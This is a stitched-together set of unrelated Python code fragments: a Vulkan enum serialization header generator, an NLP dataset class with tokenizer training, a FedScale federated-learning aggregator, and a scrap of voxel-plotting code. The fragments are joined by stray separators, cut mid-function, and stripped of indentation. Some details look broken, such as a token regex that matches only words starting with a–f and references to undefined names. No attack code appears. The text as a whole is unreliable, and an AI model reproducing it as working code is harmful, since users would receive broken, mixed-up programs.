print('Error parsing options')
sys.exit(1)
for opt, arg in opts:
if opt == '-i':
inputFile = arg
elif opt == '-o':
outputFile = arg
if(inputFile == ''):
print("Error: No Vulkan XML file specified")
sys.exit(1)
if(outputFile == ''):
print("Error: No output file specified")
sys.exit(1)
try:
dataXml = ET.parse(inputFile)
dataRoot = dataXml.getroot()
except:
print("Error: Could not open input file: ", inputFile)
sys.exit(1)
firstVersion = int(dataRoot.get('first'))
lastVersion = int(dataRoot.get('last'))
outFile = open(outputFile, "w")
# Common Header
with open("common_header.txt") as fd:
outFile.write(fd.read())
outFile.write('\n')
#
outFile.write("""#ifndef VK_VALUE_SERIALIZATION_HPP
#define VK_VALUE_SERIALIZATION_HPP
/* USAGE:
To use, include this header where the declarations for the boolean checks are required.
On *ONE* compilation unit, include the definition of `#define VK_VALUE_SERIALIZATION_CONFIG_MAIN`
so that the definitions are compiled somewhere following the one definition rule.
*/
#include <vulkan/vulkan.h>
#include <string>
#include <string_view>
""")
# Static Asserts
outFile.writelines(["\nstatic_assert(VK_HEADER_VERSION >= ", str(
firstVersion), ", \"VK_HEADER_VERSION is from before the supported range.\");\n"])
outFile.writelines(["static_assert(VK_HEADER_VERSION <= ", str(
lastVersion), ", \"VK_HEADER_VERSION is from after the supported range.\");\n"])
    # Function Declarations
outFile.write("""
/**
* @brief Macro that automatically stringifies the given Vulkan type for serialization
* @param VKTYPE Actual Vulkan type
* @param VALUE Value to be serialized
* @param STRPTR Pointer to the string to store the serialization in. Only modified if true is
* returned.
* @return True if serialization was successful. False otherwise.
*/
#define VK_SERIALIZE(VKTYPE, VALUE, STRPTR) vk_serialize<VKTYPE>(#VKTYPE, VALUE, STRPTR)
/**
* @brief Macro that automatically stringifies the given Vulkan type for parsing
* @param VKTYPE Actual Vulkan type
* @param STRING String to be parsed
* @param VALPTR Pointer to the value to store the parsed value in. Only modified if true is
* returned.
 * @return True if parsing was successful. False otherwise.
*/
#define VK_PARSE(VKTYPE, STRING, VALPTR) vk_parse<VKTYPE>(#VKTYPE, STRING, VALPTR)
/**
* @brief Serializes a Vulkan enumerator/flag type (32-bit)
* @param vkType Name of the Vulkan enumerator/flag type
* @param vkValue Value being serialized
* @param pString Pointer to a string that will be modified with the serialized value. Only modified
* if true is returned.
 * @return True if the value was successfully serialized. False otherwise.
*/
bool vk_serialize(std::string_view vkType, uint32_t vkValue, std::string *pString);
/**
* @brief Parses a Vulkan enumerator/flag serialized string (32-bit)
* @param vkType Name of the Vulkan enumerator/flag type
* @param vkString String being parsed
* @param pValue Pointer to a value that will be modified with the parsed value. Only modified if
* true is returned.
 * @return True if the value was successfully parsed. False otherwise.
*/
bool vk_parse(std::string_view vkType, std::string vkString, uint32_t *pValue);
/**
* @brief Serializes a Vulkan enumerator/flag type (64-bit)
* @param vkType Name of the Vulkan enumerator/flag type
* @param vkValue Value being serialized
* @param pString Pointer to a string that will be modified with the serialized value. Only modified
* if true is returned.
 * @return True if the value was successfully serialized. False otherwise.
*/
bool vk_serialize(std::string_view vkType, uint64_t vkValue, std::string *pString);
/**
* @brief Parses a Vulkan enumerator/flag serialized string (64-bit)
* @param vkType Name of the Vulkan enumerator/flag type
* @param vkString String being parsed
* @param pValue Pointer to a value that will be modified with the parsed value. Only modified if
* true is returned.
 * @return True if the value was successfully parsed. False otherwise.
*/
bool vk_parse(std::string_view vkType, std::string vkString, uint64_t *pValue);
/**
* @brief Serializes a Vulkan enumerator/flag type
 * @tparam T Vulkan type being serialized
* @param vkType Name of the Vulkan enumerator/flag type
* @param vkValue Value being serialized
* @param pString Pointer to a string that will be modified with the serialized value. Only modified
* if true is returned.
 * @return True if the value was successfully serialized. False otherwise.
*/
template <typename T>
bool vk_serialize(std::string_view vkType, T vkValue, std::string *pString) {
return vk_serialize(vkType, static_cast<uint32_t>(vkValue), pString);
}
/**
* @brief Parses a Vulkan enumerator/flag serialized string
 * @tparam T Vulkan type being parsed
* @param vkType Name of the Vulkan enumerator/flag type
* @param vkString String being parsed
* @param pValue Pointer to a value that will be modified with the parsed value. Only modified if
* true is returned.
 * @return True if the value was successfully parsed. False otherwise.
*/
template <typename T>
bool vk_parse(std::string_view vkType, std::string vkString, T *pValue) {
uint32_t retVal = 0;
auto found = vk_parse(vkType, vkString, &retVal);
if (found) {
*pValue = static_cast<T>(retVal);
}
return found;
}
""")
# Definition Start
outFile.write("\n#ifdef VK_VALUE_SERIALIZATION_CONFIG_MAIN\n")
outFile.write("\n#include <algorithm>\n")
outFile.write("#include <array>\n")
outFile.write("#include <cstring>\n")
outFile.write("\nnamespace {\n")
# Vendors
vendors = dataRoot.findall('vendors/')
processVendors(outFile, vendors)
# EnumSet Declaration
outFile.write("\nstruct EnumValueSet {\n")
outFile.write(" std::string_view name;\n")
outFile.write(" int64_t value;\n")
outFile.write("};\n")
# Enums
enums = dataRoot.findall('enums/')
processEnums(outFile, enums, vendors, firstVersion, lastVersion)
# Enum Type Declaration
outFile.write("\nstruct EnumType {\n")
outFile.write(" std::string_view name;\n")
outFile.write(" EnumValueSet const* data;\n")
outFile.write(" uint32_t count;\n")
outFile.write(" bool allowEmpty;\n")
outFile.write("};\n")
# Enum Pointer Array
outFile.writelines(["\nconstexpr std::array<EnumType, ", str(
len(enums)-1), "> enumTypes = {{\n"]) # -1 for not doing VkResult
for enum in enums:
if enum.tag == 'VkResult':
continue
valueCount = len(enum.findall('./'))
if valueCount == 0:
outFile.writelines(
[" {\"", str(enum.tag), "\", nullptr, 0, true},\n"])
else:
allowEmpty = "true"
for enumVal in enum.findall('./'):
if enumVal.get('first') == enum.get('first'):
allowEmpty = "false"
outFile.writelines([" {\"", str(enum.tag), "\", ", str(
enum.tag), "Sets, ", str(valueCount), ", ", allowEmpty, "},\n"])
outFile.write('}};\n')
# Function definitions
outFile.write("""
/**
* @brief Removes a vendor tag from the end of the given string view
* @param view String view to remove the vendor tag from
* @return A string_view without the vendor tag, if it was suffixed
*/
std::string_view stripVendor(std::string_view view) {
for (auto const &it : vendors) {
// Don't strip if it's all that's left
if (view == it)
break;
if (strncmp(view.data() + view.size() - it.size(), it.data(), it.size()) == 0) {
view = view.substr(0, view.size() - it.size());
break;
}
}
return view;
}
/**
 * @brief Strips '_BIT' from the end of a string, if present
*/
std::string_view stripBit(std::string_view view) {
if (view.size() > strlen("_BIT")) {
if (view.substr(view.size() - strlen("_BIT")) == "_BIT") {
return view.substr(0, view.size() - strlen("_BIT"));
}
}
return view;
}
bool getEnumType(std::string_view vkType,
EnumValueSet const **ppStart,
EnumValueSet const **ppEnd,
bool *pAllowEmpty) {
// Check for a conversion from Flags -> FlagBits
std::string localString;
if (vkType.rfind("Flags") != std::string::npos) {
localString = vkType;
auto it = localString.rfind("Flags");
localString = localString.replace(it, strlen("Flags"), "FlagBits");
vkType = localString;
}
// Try the original name
for (auto const &it : enumTypes) {
if (vkType == std::string_view{it.name}) {
*ppStart = | |
import os
import pickle
import re
from abc import ABCMeta, abstractproperty
from itertools import chain
from numbers import Number
from types import MethodType
from typing import Dict, Generator, Iterable, List, Optional, Tuple, Union
from typing_extensions import Literal
from urllib.request import urlretrieve
from odin.backend.types_helpers import DataType, LabelType
import numpy as np
import tensorflow as tf
from numpy import ndarray
from odin.fuel.dataset_base import IterableDataset, get_partition
from odin.utils import one_hot
from scipy import sparse
from scipy.sparse import csr_matrix, spmatrix
from six import add_metaclass, string_types
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
from sklearn.exceptions import NotFittedError
from sklearn.utils.validation import check_is_fitted
try:
from tokenizers import Encoding
from tokenizers.implementations import BaseTokenizer
except ImportError:
Encoding = "Encoding"
BaseTokenizer = object
# ===========================================================================
# Helpers
# ===========================================================================
_token_pattern = re.compile(r"(?u)\b[a-fA-F]\w+\b")
def _simple_tokenizer(doc: str) -> List[str]:
return _token_pattern.findall(doc)
def _simple_preprocess(doc: str) -> str:
doc = doc.lower().strip()
doc = re.sub(r"'", "", doc)
doc = re.sub(r"\W", " ", doc)
doc = re.sub(r"\s+", " ", doc)
return doc
# ===========================================================================
# Base dataset
# ===========================================================================
@add_metaclass(ABCMeta)
class NLPDataset(IterableDataset):
r"""
Arguments:
algorithm: {'tf', 'tfidf', 'bert'}
Which algorithm used for tokenizing
'tf' - term frequency or bag-of-words
'tfidf' - term count and inverse document frequency
'count' - count vectorizer
'bert' - BERT tokenizer
vocab_size: int
The size of the final vocabulary, including all tokens and alphabet.
min_frequency: int
When building the vocabulary ignore terms that have a document
frequency strictly lower than the given threshold. This value is also
called cut-off in the literature.
If float in range of [0.0, 1.0], the parameter represents a proportion
of documents, integer absolute counts.
This parameter is ignored if vocabulary is not None.
max_frequency : float or int, default=1.0
When building the vocabulary ignore terms that have a document
frequency strictly higher than the given threshold (corpus-specific
stop words).
If float in range [0.0, 1.0], the parameter represents a proportion of
documents, integer absolute counts.
This parameter is ignored if vocabulary is not None.
limit_alphabet: int
The maximum different characters to keep in the alphabet.
max_length : int
longest document length
ngram_range : tuple (min_n, max_n), default=(1, 1)
The lower and upper boundary of the range of n-values for different
n-grams to be extracted. All values of n such that min_n <= n <= max_n
      will be used. For example an ``ngram_range`` of ``(1, 1)`` means only
      unigrams, and ``(1, 2)`` means unigrams and bigrams.
Only applies if ``analyzer is not callable``.
"""
def __init__(self,
algorithm: str = 'tf',
vocab_size: int = 1000,
min_frequency: int = 2,
max_frequency: float = 0.98,
limit_alphabet: int = 1000,
max_length: Optional[int] = 1000,
ngram_range: Tuple[int, int] = (1, 1),
vocabulary: Dict[str, int] = None,
retrain_tokenizer: bool = False,
cache_path: str = "~/nlp_data"):
self._cache_path = os.path.abspath(os.path.expanduser(cache_path))
self._labels = []
#
self._vocabulary = None
if vocabulary is not None:
vocab_size = len(vocabulary)
with open(os.path.join(self.cache_path, "bert_vocab.txt"), 'w') as f:
for special_token in ("[SEP]", "[UNK]", "[CLS]", "[PAD]", "[MASK]"):
f.write(f"{special_token}\n")
for term, idx in sorted(vocabulary.items(), key=lambda x: x[-1]):
f.write(term + '\n')
self._init_vocabulary = vocabulary
self.max_length = max_length
self.vocab_size = int(vocab_size)
self.min_frequency = int(min_frequency)
self.max_frequency = float(max_frequency)
self.limit_alphabet = int(limit_alphabet)
self.ngram_range = tuple(ngram_range)
self.retrain_tokenizer = bool(retrain_tokenizer)
    # load existing tokenizer
algorithm = str(algorithm).lower().strip()
assert algorithm in ('tf', 'tfidf', 'bert', 'count'), \
f"Support algorithm: tf, tfidf, count and bert; but given:{algorithm}"
self.algorithm = algorithm
self._tokenizer = None
@property
def data_type(self) -> DataType:
return 'text'
@property
def label_type(self) -> LabelType:
raise NotImplementedError
@property
def shape(self) -> List[int]:
return self.transform('train').shape[1:]
@property
def labels(self) -> List[str]:
return np.array(self._labels)
@abstractproperty
def train_text(self) -> Iterable[str]:
raise NotImplementedError
@abstractproperty
def valid_text(self) -> Iterable[str]:
raise NotImplementedError
@abstractproperty
def test_text(self) -> Iterable[str]:
raise NotImplementedError
@property
def train_labels(self) -> Union[ndarray, spmatrix]:
return np.asarray([])
@property
def valid_labels(self) -> Union[ndarray, spmatrix]:
return np.asarray([])
@property
def test_labels(self) -> Union[ndarray, spmatrix]:
return np.asarray([])
def filter_by_length(
self,
inputs: Union[int, List[str], List[Encoding]],
iqr_multiplier: float = 1.5,
length_range: Optional[Tuple[int, int]] = None
) -> Tuple[List[bool], int, int]:
r""" Using inter-quartile to filter out outlier documents by their
tokenized lengths. """
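    # Keeps documents whose token count falls within (Q1 - k*IQR, Q3 + k*IQR),
    # where IQR = Q3 - Q1 and k = iqr_multiplier; an explicit length_range overrides this.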
lengths = np.asarray(
[
len(i.split(" ")) if isinstance(i, string_types) else
(int(i) if isinstance(i, Number) else len(i)) for i in inputs
],
dtype=np.int32,
)
if length_range is None:
q1 = np.quantile(lengths, 0.25)
q3 = np.quantile(lengths, 0.75)
iqr = q3 - q1
lmin = q1 - iqr_multiplier * iqr
lmax = q3 + iqr_multiplier * iqr
else:
lmin, lmax = length_range
mask = np.logical_and(lengths > lmin, lengths < lmax)
return mask, lmin, lmax
def transform(self,
documents: Optional[Union[str, List[str]]] = None) -> spmatrix:
r""" Vectorize the input documents """
# cached transformed dataset
if isinstance(documents, string_types) and \
documents in ('train', 'valid', 'test'):
attr_name = f'_x_{documents}'
if hasattr(self, attr_name):
return getattr(self, attr_name)
x = self.transform(
get_partition(documents,
train=self.train_text,
valid=self.valid_text,
test=self.test_text))
setattr(self, attr_name, x)
return x
# other data
if self.algorithm in ('tf', 'tfidf', 'count'):
x = self.tokenizer.transform(documents)
      # sorted to ensure right ordering for Tensorflow SparseTensor
else:
if isinstance(documents, Generator):
documents = [i for i in documents]
x = sparse.csr_matrix(
[i.ids for i in self.encode(documents, post_process=True)])
return x
@property
def cache_path(self) -> str:
if not os.path.exists(self._cache_path):
os.makedirs(self._cache_path)
return self._cache_path
@property
def tokenizer(self) -> Union[BaseTokenizer, CountVectorizer, TfidfVectorizer]:
pkl_path = os.path.join(self.tokenizer_path, "model.pkl")
if self._tokenizer is not None:
return self._tokenizer
### get pickled tokenizer
if os.path.exists(pkl_path) and not self.retrain_tokenizer:
with open(pkl_path, 'rb') as f:
tokenizer = pickle.load(f)
### train new tokenizer
else:
self.retrain_tokenizer = False
if self.algorithm == 'bert':
from tokenizers import BertWordPieceTokenizer
tokenizer = BertWordPieceTokenizer(
vocab_file=None if self._init_vocabulary is None else os.path.
join(self.cache_path, "bert_vocab.txt"))
tokenizer.enable_truncation(max_length=self.max_length)
tokenizer.enable_padding(length=self.max_length)
# train the tokenizer
if self._init_vocabulary is None:
path = os.path.join(self.cache_path, 'train.txt')
with open(path, 'w') as f:
for i in chain(self.train_text, self.valid_text, self.test_text):
if len(i) == 0:
continue
f.write(i + "\n" if i[-1] != "\n" else i)
tokenizer.train(files=path,
vocab_size=self.vocab_size,
min_frequency=self.min_frequency,
limit_alphabet=self.limit_alphabet,
show_progress=True)
tokenizer.save_model(self.tokenizer_path)
elif self.algorithm in ('count', 'tf', 'tfidf'):
if self.algorithm == 'count':
tokenizer = CountVectorizer(input='content',
ngram_range=self.ngram_range,
min_df=self.min_frequency,
max_df=self.max_frequency,
max_features=self.vocab_size,
vocabulary=self._init_vocabulary,
tokenizer=_simple_tokenizer,
stop_words='english')
elif self.algorithm in ('tf', 'tfidf'):
tokenizer = TfidfVectorizer(
input='content',
ngram_range=self.ngram_range,
min_df=self.min_frequency,
max_df=self.max_frequency,
max_features=self.vocab_size,
stop_words='english',
vocabulary=self._init_vocabulary,
tokenizer=_simple_tokenizer,
use_idf=False if self.algorithm == 'tf' else True)
tokenizer.fit(
(_simple_preprocess(i)
for i in chain(self.train_text, self.valid_text, self.test_text)))
else:
raise NotImplementedError
# save the pickled model
with open(pkl_path, "wb") as f:
pickle.dump(tokenizer, f)
### assign and return
self._tokenizer = tokenizer
return self._tokenizer
@property
def tokenizer_path(self) -> str:
p = os.path.join(
self.cache_path, f"tokenizer_{self.algorithm}_{self.vocab_size}_"
f"{self.min_frequency}_{self.max_frequency}_"
f"{self.limit_alphabet}")
if not os.path.exists(p):
os.makedirs(p)
return p
@property
def vocabulary(self) -> Dict[int, str]:
if self._vocabulary is None:
if self.algorithm in ('tf', 'tfidf', 'count'):
vocab = self.tokenizer.vocabulary_
else:
vocab = self.tokenizer.get_vocab()
self._vocabulary = {
v: k for k, v in sorted(vocab.items(), key=lambda x: x[-1])
}
return self._vocabulary
@property
def vocabulary_size(self) -> int:
return len(self.vocabulary)
def encode(self,
inputs: Union[str, List[str]],
add_special_tokens: bool = True,
post_process: bool = False) -> List[Encoding]:
r""" Encode sequence of text string """
is_batch = True
if isinstance(inputs, string_types):
inputs = [inputs]
is_batch = False
    outputs = self.tokenizer.encode_batch(inputs, add_special_tokens=add_special_tokens)
if post_process:
outputs = [
self.tokenizer.post_process(i, add_special_tokens=add_special_tokens)
for i in outputs
]
return outputs if is_batch else outputs[0]
def post_process(self,
encoding,
add_special_tokens: bool = True) -> List[Encoding]:
r""" Apply all the post-processing steps to the given encodings.
The various steps are:
1. Truncate according to global params (provided to `enable_truncation`)
2. Apply the PostProcessor
3. Pad according to global params. (provided to `enable_padding`)
"""
is_batch = True
if isinstance(encoding, Encoding):
encoding = [encoding]
is_batch = False
outputs = [
self.tokenizer.post_process(i, add_special_tokens=add_special_tokens)
for i in encoding
]
return outputs if is_batch else outputs[0]
def decode(self,
ids: List[int],
skip_special_tokens: Optional[bool] = True) -> List[str]:
r""" Decode sequence of integer indices and return original sequence """
is_batch = True
if not isinstance(ids[0], (tuple, list, ndarray)):
ids = [ids]
is_batch = False
outputs = self.tokenizer.decode_batch(
ids, skip_special_tokens=skip_special_tokens)
return outputs if is_batch else outputs[0]
def create_dataset(self,
partition: Literal['train', 'valid', 'test'] = 'train',
*,
batch_size: Optional[int] = 32,
drop_remainder: bool = False,
shuffle: int = 1000,
cache: Optional[str] = '',
prefetch: Optional[int] = tf.data.experimental.AUTOTUNE,
parallel: Optional[int] = tf.data.experimental.AUTOTUNE,
label_percent: Union[bool, float] = False,
seed: int = 1) -> tf.data.Dataset:
r"""
Arguments:
partition : {'train', 'valid', 'test'}
      label_percent : a Boolean or Scalar. If True, return both text and label,
        otherwise, only the text is returned.
        If a scalar is provided, it indicates the percent
# -*- coding: utf-8 -*-
from cmath import log
from fedscale.core import response
from fedscale.core.fl_aggregator_libs import *
from fedscale.core.resource_manager import ResourceManager
from fedscale.core import events
from fedscale.core import job_api_pb2
import fedscale.core.job_api_pb2_grpc as job_api_pb2_grpc
import torch
from torch.utils.tensorboard import SummaryWriter
import threading
import pickle
import grpc
from concurrent import futures
MAX_MESSAGE_LENGTH = 1*1024*1024*1024 # 1GB
class Aggregator(job_api_pb2_grpc.JobServiceServicer):
"""This centralized aggregator collects training/testing feedbacks from executors"""
def __init__(self, args):
logging.info(f"Job args {args}")
self.args = args
self.experiment_mode = args.experiment_mode
self.device = args.cuda_device if args.use_cuda else torch.device('cpu')
# ======== env information ========
self.this_rank = 0
self.global_virtual_clock = 0.
self.round_duration = 0.
self.resource_manager = ResourceManager(self.experiment_mode)
self.client_manager = self.init_client_manager(args=args)
# ======== model and data ========
self.model = None
self.model_in_update = 0
self.update_lock = threading.Lock()
self.model_weights = collections.OrderedDict() # all weights including bias/#_batch_tracked (e.g., state_dict)
self.last_gradient_weights = [] # only gradient variables
self.model_state_dict = None
# ======== channels ========
self.connection_timeout = self.args.connection_timeout
self.executors = None
self.grpc_server = None
# ======== Event Queue =======
self.individual_client_events = {} # Unicast
self.sever_events_queue = collections.deque()
self.broadcast_events_queue = collections.deque() # Broadcast
# ======== runtime information ========
self.tasks_round = 0
# NOTE: sampled_participants = sampled_executors in deployment,
# because every participant is an executor. However, in simulation mode,
        # executors are the physical machines (VMs), thus:
        # |sampled_executors| << |sampled_participants| as a VM may run multiple participants
self.sampled_participants = []
self.sampled_executors = []
self.round_stragglers = []
self.model_update_size = 0.
self.collate_fn = None
self.task = args.task
self.round = 0
self.start_run_time = time.time()
self.client_conf = {}
self.stats_util_accumulator = []
self.loss_accumulator = []
self.client_training_results = []
# number of registered executors
self.registered_executor_info = set()
self.test_result_accumulator = []
self.testing_history = {'data_set': args.data_set, 'model': args.model, 'sample_mode': args.sample_mode,
'gradient_policy': args.gradient_policy, 'task': args.task, 'perf': collections.OrderedDict()}
self.log_writer = SummaryWriter(log_dir=logDir)
# ======== Task specific ============
self.imdb = None # object detection
def setup_env(self):
self.setup_seed(seed=self.this_rank)
# set up device
if self.args.use_cuda and self.device == None:
for i in range(torch.cuda.device_count()):
try:
self.device = torch.device('cuda:'+str(i))
torch.cuda.set_device(i)
_ = torch.rand(1).to(device=self.device)
logging.info(f'End up with cuda device ({self.device})')
break
except Exception as e:
assert i != torch.cuda.device_count()-1, 'Can not find available GPUs'
self.optimizer = ServerOptimizer(self.args.gradient_policy, self.args, self.device)
def setup_seed(self, seed=1):
"""Set global random seed for better reproducibility"""
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
random.seed(seed)
torch.backends.cudnn.deterministic = True
def init_control_communication(self):
# Create communication channel between aggregator and worker
# This channel serves control messages
logging.info(f"Initiating control plane communication ...")
if self.experiment_mode == events.SIMULATION_MODE:
num_of_executors = 0
for ip_numgpu in self.args.executor_configs.split("="):
ip, numgpu = ip_numgpu.split(':')
for numexe in numgpu.strip()[1:-1].split(','):
for _ in range(int(numexe.strip())):
num_of_executors += 1
self.executors = list(range(num_of_executors))
else:
self.executors = list(range(self.args.total_worker))
# initiate a server process
self.grpc_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=20),
options=[
('grpc.max_send_message_length', MAX_MESSAGE_LENGTH),
('grpc.max_receive_message_length', MAX_MESSAGE_LENGTH),
],
)
job_api_pb2_grpc.add_JobServiceServicer_to_server(self, self.grpc_server)
port = '[::]:{}'.format(self.args.ps_port)
        logging.info(f'%%%%%%%%%% Opening aggregator server using port {port} %%%%%%%%%%')
self.grpc_server.add_insecure_port(port)
self.grpc_server.start()
def init_data_communication(self):
"""For jumbo traffics (e.g., training results).
"""
pass
def init_model(self):
"""Load model"""
if self.args.task == "detection":
cfg_from_file(self.args.cfg_file)
np.random.seed(self.cfg.RNG_SEED)
self.imdb, _, _, _ = combined_roidb("voc_2007_test", ['DATA_DIR', self.args.data_dir], server=True)
self.model = init_model()
self.model_weights = self.model.state_dict()
def init_client_manager(self, args):
"""
Currently we implement two client managers:
1. Random client sampler
- it selects participants randomly in each round
- [Ref]: https://arxiv.org/abs/1902.01046
2. Oort sampler
- Oort prioritizes the use of those clients who have both data that offers the greatest utility
in improving model accuracy and the capability to run training quickly.
- [Ref]: https://www.usenix.org/conference/osdi21/presentation/lai
"""
# sample_mode: random or kuiper
client_manager = clientManager(args.sample_mode, args=args)
return client_manager
def load_client_profile(self, file_path):
"""For Simulation Mode: load client profiles/traces"""
global_client_profile = {}
if os.path.exists(file_path):
with open(file_path, 'rb') as fin:
# {clientId: [computer, bandwidth]}
global_client_profile = pickle.load(fin)
return global_client_profile
def executor_info_handler(self, executorId, info):
self.registered_executor_info.add(executorId)
logging.info(f"Received executor {executorId} information, {len(self.registered_executor_info)}/{len(self.executors)}")
# have collected all executors
# In this simulation, we run data split on each worker, so collecting info from one executor is enough
# Waiting for data information from executors, or timeout
if len(self.registered_executor_info) == len(self.executors):
num_of_clients = 1
logging.info(f"Loading {len(info['size'])} client traces ...")
for _size in info['size']:
# since the worker rankId starts from 1, we also configure the initial dataId as 1
mapped_id = num_of_clients%len(self.client_profiles) if len(self.client_profiles) > 0 else 1
systemProfile = self.client_profiles.get(mapped_id, {'computation': 1.0, 'communication':1.0})
clientId = num_of_clients if self.experiment_mode == events.SIMULATION_MODE else executorId
self.client_manager.registerClient(executorId, clientId, size=_size, speed=systemProfile)
self.client_manager.registerDuration(clientId, batch_size=self.args.batch_size,
upload_step=self.args.local_steps, upload_size=self.model_update_size, download_size=self.model_update_size)
num_of_clients += 1
logging.info("Info of all feasible clients {}".format(self.client_manager.getDataInfo()))
# start to sample clients
self.round_completion_handler()
def tictak_client_tasks(self, sampled_clients, num_clients_to_collect):
if self.experiment_mode == events.SIMULATION_MODE:
            # NOTE: We try to remove dummy events as much as possible in simulations,
            # by removing the stragglers/offline clients in overcommitment
sampledClientsReal = []
completionTimes = []
completed_client_clock = {}
# 1. remove dummy clients that are not available to the end of training
for client_to_run in sampled_clients:
client_cfg = self.client_conf.get(client_to_run, self.args)
exe_cost = self.client_manager.getCompletionTime(client_to_run,
batch_size=client_cfg.batch_size, upload_step=client_cfg.local_steps,
upload_size=self.model_update_size, download_size=self.model_update_size)
roundDuration = exe_cost['computation'] + exe_cost['communication']
                # if the client is not active by the time of collection, we consider it lost in this round
if self.client_manager.isClientActive(client_to_run, roundDuration + self.global_virtual_clock):
sampledClientsReal.append(client_to_run)
completionTimes.append(roundDuration)
completed_client_clock[client_to_run] = exe_cost
num_clients_to_collect = min(num_clients_to_collect, len(completionTimes))
# 2. get the top-k completions to remove stragglers
sortedWorkersByCompletion = sorted(range(len(completionTimes)), key=lambda k:completionTimes[k])
top_k_index = sortedWorkersByCompletion[:num_clients_to_collect]
clients_to_run = [sampledClientsReal[k] for k in top_k_index]
dummy_clients = [sampledClientsReal[k] for k in sortedWorkersByCompletion[num_clients_to_collect:]]
round_duration = completionTimes[top_k_index[-1]]
completionTimes.sort()
return clients_to_run, dummy_clients, completed_client_clock, round_duration, completionTimes[:num_clients_to_collect]
else:
completed_client_clock = {client:{'computation': 1, 'communication':1} for client in sampled_clients}
completionTimes = [1 for c in sampled_clients]
return sampled_clients, sampled_clients, completed_client_clock, 1, completionTimes
def run(self):
self.setup_env()
self.init_model()
self.save_last_param()
self.model_update_size = sys.getsizeof(pickle.dumps(self.model))/1024.0*8. # kbits
self.client_profiles = self.load_client_profile(file_path=self.args.device_conf_file)
self.init_control_communication()
self.init_data_communication()
self.event_monitor()
def select_participants(self, select_num_participants, overcommitment=1.3):
return sorted(self.client_manager.resampleClients(
int(select_num_participants*overcommitment), cur_time=self.global_virtual_clock))
def client_completion_handler(self, results):
"""We may need to keep all updates from clients, if so, we need to append results to the cache"""
# Format:
# -results = {'clientId':clientId, 'update_weight': model_param, 'moving_loss': round_train_loss,
# 'trained_size': count, 'wall_duration': time_cost, 'success': is_success 'utility': utility}
if self.args.gradient_policy in ['q-fedavg']:
self.client_training_results.append(results)
# Feed metrics to client sampler
self.stats_util_accumulator.append(results['utility'])
self.loss_accumulator.append(results['moving_loss'])
self.client_manager.registerScore(results['clientId'], results['utility'],
auxi=math.sqrt(results['moving_loss']),
time_stamp=self.round,
duration=self.virtual_client_clock[results['clientId']]['computation']+
self.virtual_client_clock[results['clientId']]['communication']
)
device = self.device
"""
[FedAvg] "Communication-Efficient Learning of Deep Networks from Decentralized Data".
<NAME>, <NAME>, <NAME>, <NAME>, <NAME>. AISTATS, 2017
"""
# Start to take the average of updates, and we do not keep updates to save memory
# Importance of each update is 1/#_of_participants
# importance = 1./self.tasks_round
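        # A minimal sketch of the equal-weight average computed below:
        #   w_global = (1 / tasks_round) * sum_i w_i
        # each incoming update is accumulated into model_weights, and the sum is divided
        # by the number of participants once the last update of the round arrives.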
self.update_lock.acquire()
# ================== Aggregate weights ======================
self.model_in_update += 1
if self.model_in_update == 1:
for p in results['update_weight']:
temp_list = results['update_weight'][p]
if isinstance(results['update_weight'][p], list):
temp_list = np.asarray(temp_list, dtype=np.float32)
self.model_weights[p].data = torch.from_numpy(temp_list).to(device=device)
else:
for p in results['update_weight']:
temp_list = results['update_weight'][p]
if isinstance(results['update_weight'][p], list):
temp_list = np.asarray(temp_list, dtype=np.float32)
self.model_weights[p].data += torch.from_numpy(temp_list).to(device=device)
if self.model_in_update == self.tasks_round:
for p in self.model_weights:
d_type = self.model_weights[p].data.dtype
self.model_weights[p].data = (self.model_weights[p]/float(self.tasks_round)).to(dtype=d_type)
self.update_lock.release()
def save_last_param(self):
self.last_gradient_weights = [p.data.clone() for p in self.model.parameters()]
def round_weight_handler(self, last_model):
"""Update model when the round completes"""
if self.round > 1:
self.model.load_state_dict(self.model_weights)
current_grad_weights = [param.data.clone() for param in self.model.parameters()]
self.optimizer.update_round_gradient(last_model, current_grad_weights, self.model)
def round_completion_handler(self):
self.global_virtual_clock += self.round_duration
self.round += 1
if self.round % self.args.decay_round == 0:
self.args.learning_rate = max(self.args.learning_rate*self.args.decay_factor, self.args.min_learning_rate)
# handle the global update w/ current and last
self.round_weight_handler(self.last_gradient_weights)
avgUtilLastround = sum(self.stats_util_accumulator)/max(1, len(self.stats_util_accumulator))
        # assign the average reward to workers that were explored but did not run
for clientId in self.round_stragglers:
self.client_manager.registerScore(clientId, avgUtilLastround,
time_stamp=self.round,
duration=self.virtual_client_clock[clientId]['computation']+self.virtual_client_clock[clientId]['communication'],
success=False)
avg_loss = sum(self.loss_accumulator)/max(1, len(self.loss_accumulator))
logging.info(f"Wall clock: {round(self.global_virtual_clock)} s, round: {self.round}, Planned participants: " + \
f"{len(self.sampled_participants)}, Succeed participants: {len(self.stats_util_accumulator)}, Training loss: {avg_loss}")
# dump round completion information to tensorboard
if len(self.loss_accumulator):
self.log_train_result(avg_loss)
# update select participants
self.sampled_participants = self.select_participants(
select_num_participants=self.args.total_worker, overcommitment=self.args.overcommitment)
clientsToRun, round_stragglers, virtual_client_clock, round_duration, flatten_client_duration = self.tictak_client_tasks(
self.sampled_participants, self.args.total_worker)
logging.info(f"Selected participants to run: {clientsToRun}")
# Issue requests to the resource manager; Tasks ordered by the completion time
self.resource_manager.register_tasks(clientsToRun)
self.tasks_round = len(clientsToRun)
# Update executors and participants
if self.experiment_mode == events.SIMULATION_MODE:
self.sampled_executors = list(self.individual_client_events.keys())
else:
self.sampled_executors = [str(c_id) for c_id in self.sampled_participants]
self.save_last_param()
self.round_stragglers = round_stragglers
self.virtual_client_clock = virtual_client_clock
self.flatten_client_duration = numpy.array(flatten_client_duration)
self.round_duration = round_duration
self.model_in_update = 0
self.test_result_accumulator = []
self.stats_util_accumulator = []
self.client_training_results = []
if self.round >= self.args.rounds:
self.broadcast_aggregator_events(events.SHUT_DOWN)
elif self.round % self.args.eval_interval == 0:
self.broadcast_aggregator_events(events.UPDATE_MODEL)
self.broadcast_aggregator_events(events.MODEL_TEST)
else:
self.broadcast_aggregator_events(events.UPDATE_MODEL)
self.broadcast_aggregator_events(events.START_ROUND)
def log_train_result(self, avg_loss):
"""Result will be post on TensorBoard"""
self.log_writer.add_scalar('Train/round_to_loss', avg_loss, self.round)
| |
= []
if testPlot:
print ('voxels count ', len(voxel_stack))
for ii in range(0,len(voxel_stack),len(voxel_stack)//10):
f, ax = plt.subplots(1, 2, figsize=(6,3))
